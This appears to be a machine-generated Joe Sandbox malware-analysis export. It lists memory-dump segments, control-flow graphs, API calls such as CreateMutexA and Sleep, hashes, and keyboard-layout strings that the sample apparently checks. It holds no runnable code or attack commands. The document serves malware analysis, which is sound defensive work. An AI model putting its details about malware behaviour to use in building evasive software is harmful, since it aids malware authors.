                                                                                                                                                                • Associated: 00000000.00000002.2183967335.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183994600.000000000033F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184019272.0000000000340000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184058705.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000036D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184134803.0000000000384000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184153740.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184177499.000000000039B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184195693.000000000039C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184216554.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184258734.00000000003A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184299165.00000000003B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184335891.00000000003B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_a0000_random.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload$t#$t#$t#
                                                                                                                                                                • API String ID: 0-1094863715
                                                                                                                                                                • Opcode ID: 1bed3a2cc917a091f9f0751208aed8d41232aff6eec614043961ebfdfe2a7663
                                                                                                                                                                • Instruction ID: 906517ef33d33af94ea5c0b3dc38a49f06a1391f853d4ac2cfb5e4a7ebaa7879
                                                                                                                                                                • Opcode Fuzzy Hash: 1bed3a2cc917a091f9f0751208aed8d41232aff6eec614043961ebfdfe2a7663
                                                                                                                                                                • Instruction Fuzzy Hash: 51F1D2709002589FEB24DF54CC85BEEBBB9EF45304F5082A9F508A72C2DB759A84CF95

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1413 ab1a0-ab1ec 1453 ab1ed call 4bf0dee 1413->1453 1454 ab1ed call 4bf0e8b 1413->1454 1455 ab1ed call 4bf0e09 1413->1455 1456 ab1ed call 4bf0da7 1413->1456 1457 ab1ed call 4bf0dc6 1413->1457 1458 ab1ed call 4bf0ea6 1413->1458 1459 ab1ed call 4bf0dd5 1413->1459 1460 ab1ed call 4bf0e65 1413->1460 1461 ab1ed call 4bf0da1 1413->1461 1462 ab1ed call 4bf0e31 1413->1462 1414 ab1f2-ab210 1415 ab217-ab21c 1414->1415 1415->1415 1416 ab21e-ab3cf call b80c0 call b8510 * 2 call b7a00 call b8510 * 3 CoInitialize 1415->1416 1431 ab3fa-ab74f 1416->1431 1442 ab9c4-ab9e1 call bcff1 1431->1442 1443 ab755-ab761 1431->1443 1444 ab9ba-ab9c1 call bd663 1443->1444 1445 ab767-ab775 1443->1445 1444->1442 1445->1444 1447 ab9e2-ab9e7 call d6c6a 1445->1447 1453->1414 1454->1414 1455->1414 1456->1414 1457->1414 1458->1414 1459->1414 1460->1414 1461->1414 1462->1414
                                                                                                                                                                APIs
                                                                                                                                                                • CoInitialize.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000AB3C8
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2182917529.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2182669159.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2182917529.0000000000102000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183000574.0000000000109000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183023491.000000000010B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183049504.0000000000117000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183174403.000000000026E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183198375.0000000000270000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183272831.0000000000293000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183296339.0000000000294000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183317982.0000000000295000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183338775.0000000000296000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183359688.0000000000297000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183383671.0000000000299000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183410807.00000000002A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183441616.00000000002A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183484425.00000000002BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183508664.00000000002C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183530942.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183571136.00000000002D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183600749.00000000002DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183626520.00000000002E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183651042.00000000002E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183675519.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183715487.00000000002F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183760013.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183798599.000000000030E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183816602.000000000030F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183834127.0000000000316000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183854335.000000000031B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183873864.0000000000322000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183903490.0000000000326000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183931663.000000000032E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183967335.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183994600.000000000033F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184019272.0000000000340000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184058705.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000036D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184134803.0000000000384000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184153740.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184177499.000000000039B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184195693.000000000039C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184216554.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184258734.00000000003A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184299165.00000000003B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184335891.00000000003B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_a0000_random.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Initialize
                                                                                                                                                                • String ID: t#
                                                                                                                                                                • API String ID: 2538663250-134853180
                                                                                                                                                                • Opcode ID: ca76551632bd28acd7f5a63546223ebe90f3e16e8b72bd411ce82d218bda3f5f
                                                                                                                                                                • Instruction ID: b1b1776a070766fa0c7d1884614e17643eb76fd5521d9a444a537befeabd66ec
                                                                                                                                                                • Opcode Fuzzy Hash: ca76551632bd28acd7f5a63546223ebe90f3e16e8b72bd411ce82d218bda3f5f
                                                                                                                                                                • Instruction Fuzzy Hash: BAB11870A10268DFEB28CF54CC99BDEB7B5EF05304F5085D9E40967292D775AA84CF90

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1463 a9ba5-a9d91 call b7a00 call a5c10 call a8b30 call b8220
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 000AA963
                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00103254), ref: 000AA981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2182917529.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2182669159.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2182917529.0000000000102000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183000574.0000000000109000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183023491.000000000010B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183049504.0000000000117000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183174403.000000000026E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183198375.0000000000270000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183272831.0000000000293000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183296339.0000000000294000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183317982.0000000000295000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183338775.0000000000296000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183359688.0000000000297000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183383671.0000000000299000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183410807.00000000002A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183441616.00000000002A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183484425.00000000002BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183508664.00000000002C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183530942.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183571136.00000000002D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183600749.00000000002DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183626520.00000000002E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183651042.00000000002E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183675519.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183715487.00000000002F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183760013.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183798599.000000000030E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183816602.000000000030F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183834127.0000000000316000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183854335.000000000031B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183873864.0000000000322000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183903490.0000000000326000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183931663.000000000032E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183967335.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183994600.000000000033F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184019272.0000000000340000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184058705.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000036D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184134803.0000000000384000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184153740.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184177499.000000000039B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184195693.000000000039C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184216554.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184258734.00000000003A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184299165.00000000003B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184335891.00000000003B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_a0000_random.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                • Opcode ID: 8177cd0352af123d1b2e69da0923ad2e97bfb330b126ad5a021b22f5755d2252
                                                                                                                                                                • Instruction ID: 09f870618946603bdc1ded732296a7f2b7fd5f12e920ef199d34410c6011eb21
                                                                                                                                                                • Opcode Fuzzy Hash: 8177cd0352af123d1b2e69da0923ad2e97bfb330b126ad5a021b22f5755d2252
                                                                                                                                                                • Instruction Fuzzy Hash: B83159317102048BEB18EBB8DD897AEB7A6EF87310F208219E014AB3D6C7759981C761

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1485 a9f44-a9f64 1489 a9f92-a9fae 1485->1489 1490 a9f66-a9f72 1485->1490 1491 a9fdc-a9ffb 1489->1491 1492 a9fb0-a9fbc 1489->1492 1493 a9f88-a9f8f call bd663 1490->1493 1494 a9f74-a9f82 1490->1494 1497 aa029-aa916 call b80c0 1491->1497 1498 a9ffd-aa009 1491->1498 1495 a9fbe-a9fcc 1492->1495 1496 a9fd2-a9fd9 call bd663 1492->1496 1493->1489 1494->1493 1499 aa92b 1494->1499 1495->1496 1495->1499 1496->1491 1502 aa00b-aa019 1498->1502 1503 aa01f-aa026 call bd663 1498->1503 1505 aa953-aa994 Sleep CreateMutexA 1499->1505 1506 aa92b call d6c6a 1499->1506 1502->1499 1502->1503 1503->1497 1514 aa996-aa998 1505->1514 1515 aa9a7-aa9a8 1505->1515 1506->1505 1514->1515 1517 aa99a-aa9a5 1514->1517 1517->1515
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 000AA963
                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00103254), ref: 000AA981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2182917529.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2182669159.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2182917529.0000000000102000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183000574.0000000000109000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183023491.000000000010B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183049504.0000000000117000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183174403.000000000026E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183198375.0000000000270000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183272831.0000000000293000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183296339.0000000000294000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183317982.0000000000295000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183338775.0000000000296000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183359688.0000000000297000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183383671.0000000000299000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183410807.00000000002A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183441616.00000000002A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183484425.00000000002BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183508664.00000000002C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183530942.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183571136.00000000002D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183600749.00000000002DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183626520.00000000002E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183651042.00000000002E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183675519.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183715487.00000000002F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183760013.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183798599.000000000030E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183816602.000000000030F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183834127.0000000000316000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183854335.000000000031B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183873864.0000000000322000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183903490.0000000000326000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183931663.000000000032E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183967335.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183994600.000000000033F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184019272.0000000000340000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184058705.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000036D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184134803.0000000000384000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184153740.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184177499.000000000039B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184195693.000000000039C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184216554.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184258734.00000000003A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184299165.00000000003B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184335891.00000000003B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_a0000_random.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                • Opcode ID: a7c64ad37a10b665e2b7632c468c238218960bfd323450bd1369d71212ba5c0c
                                                                                                                                                                • Instruction ID: 4c0818c6fdd178c0541e8f5b23f9ddd1d734082ea519801f98db0dfb56c8dfda
                                                                                                                                                                • Opcode Fuzzy Hash: a7c64ad37a10b665e2b7632c468c238218960bfd323450bd1369d71212ba5c0c
                                                                                                                                                                • Instruction Fuzzy Hash: 25315B317002049FEB18ABB8DC88BEDB7A2EF87310F208619E014EB2D5D7769985C752

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1519 aa079-aa099 1523 aa09b-aa0a7 1519->1523 1524 aa0c7-aa0e3 1519->1524 1527 aa0a9-aa0b7 1523->1527 1528 aa0bd-aa0c4 call bd663 1523->1528 1525 aa111-aa130 1524->1525 1526 aa0e5-aa0f1 1524->1526 1531 aa15e-aa916 call b80c0 1525->1531 1532 aa132-aa13e 1525->1532 1529 aa0f3-aa101 1526->1529 1530 aa107-aa10e call bd663 1526->1530 1527->1528 1533 aa930 1527->1533 1528->1524 1529->1530 1529->1533 1530->1525 1538 aa140-aa14e 1532->1538 1539 aa154-aa15b call bd663 1532->1539 1535 aa953-aa994 Sleep CreateMutexA 1533->1535 1536 aa930 call d6c6a 1533->1536 1548 aa996-aa998 1535->1548 1549 aa9a7-aa9a8 1535->1549 1536->1535 1538->1533 1538->1539 1539->1531 1548->1549 1551 aa99a-aa9a5 1548->1551 1551->1549
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 000AA963
                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00103254), ref: 000AA981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2182917529.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2182669159.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2182917529.0000000000102000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183000574.0000000000109000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183023491.000000000010B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183049504.0000000000117000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183174403.000000000026E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183198375.0000000000270000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183272831.0000000000293000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183296339.0000000000294000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183317982.0000000000295000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183338775.0000000000296000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183359688.0000000000297000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183383671.0000000000299000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183410807.00000000002A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183441616.00000000002A9000.00000040.00000001.01000000.00000003.sdmpDownload File
